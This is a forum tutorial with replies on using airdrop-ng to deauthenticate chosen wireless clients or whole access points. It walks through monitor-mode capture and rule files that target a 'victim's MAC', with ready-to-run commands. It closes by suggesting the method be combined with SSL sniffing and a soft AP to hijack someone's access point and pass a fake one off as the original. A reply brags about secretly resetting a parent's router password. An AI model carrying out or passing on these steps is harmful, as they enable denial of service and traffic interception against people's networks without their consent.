[align=center]Airdrop-ng tutorial - Rule Based Deauth[/align] This tutorial is based in backtrack4 and i'll assume you are competent with linux to the standard this tutorial requires. You must also have a packet injection/monitor mode supported wireless interface.
Capturing Your Surrounding's First we need to capture the wireless activity in the area.
airmon-ng [to check the interface you will be using] airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly] airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']
This step you can do previous to capturing the file if you have a specific target you know the MAC address of, but normally is done afterwards so you can review the output in the terminal of airodump-ng [last command above].
MAC Rules Info We need to understand a basic formula for how the 'rules' work within airdrop-ng, a = allow whereas d = deny, I know rocket science isn't it lol. This is where it gets to the good bit. The format of each rule whether it's allow or deny access is allow(a) or deny(d) then bssid's MAC followed by the client's MAC. Below are example of how it would look.
Allow rule: a/bssid MAC ['any']|victim's MAC ['any']
Deny rule: d/bssid MAC ['any']|victim's MAC ['any']
However, you may wonder what the 'any' is for. Well if you decide you don't want anyone to connect to a bssid then you would put this for example:
d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]
To do the opposite and allow a MAC to not connect to anything:
d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block.
Implementing MAC Rules To put the rules in place we need to setup a 'rules' file which airdrop will read and implement the rules from. To add rules to the file we do so thus:
echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']
The contents will look like this [remember i'm using D to remind you this is Deny!! #D d/any|xy:xy:xy:xy:xy:xy
Running Airdrop-ng Installing Airdrop through synaptic is what i'll advise you to do as it places everything in the right place for you to follow this tutorial. Navigate using terminal to the airdrop directory: cd /pentest/wireless/airdrop-ng/
Once there we start airdrop-ng: airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]
We next have to understand a very important concept in the rules file reading process done by airdrop-ng. The program reads from top to bottom so allow rules applying to a specific MAC but come before deny rules applying to the same MAC. Using another example i'll demonstrate.
#D d/xy:xy:xy:xy:xy:xy|any [we've now blocked all access to a AP/bssid, but then we decide we want a specific MAC only to connect to it. This must but done as shown below].
As you can see above our original rule of denying every connection to the AP is below the rule to grant/allow access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use for following command:
nano rules [you can use other text editor's but I prefer nano, it's down to personal preference]
Note: alot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.
OUI [Organizationally Unique Identifier] Hardware names Airdop also had the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implmented in the same way as the MAC's, I won't be giving out a tutorial on this part because it's had hit and miss results and i've not personally tried it only the MAC deauth. However, the OUI list is located below: nano /pentest/wireless/airdrop-ng/support/oui.txt
To update the OUI list use: airdrop-ng -u
How does this tutorial help you? If you combine my other tutorial on SSL sniffing and SoftAP's with this, you could hijack someones AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system. My other tutorial
Another great tutorial your pretty good at all this network stuff!
Yeah it's the hacking area I get most practice at, My parents know nothing about computer's let alone networking so i've had to set our home one up. Wireless router downstairs [with ethernet to parent's computer], upstairs in my room I set up a wireless AP with it's own subnet, did have a hardware firewall but took it down for one reason or another, that tower's now used for wireless hack testing and got my desktop, did have two laptops [now just one] and the Wii on wireless. My room must drain so much electricity, it's mad. They still don't know I reset the passwd on the router and that was years ago. Networking's fun but I definitely want to expand my knowledge :D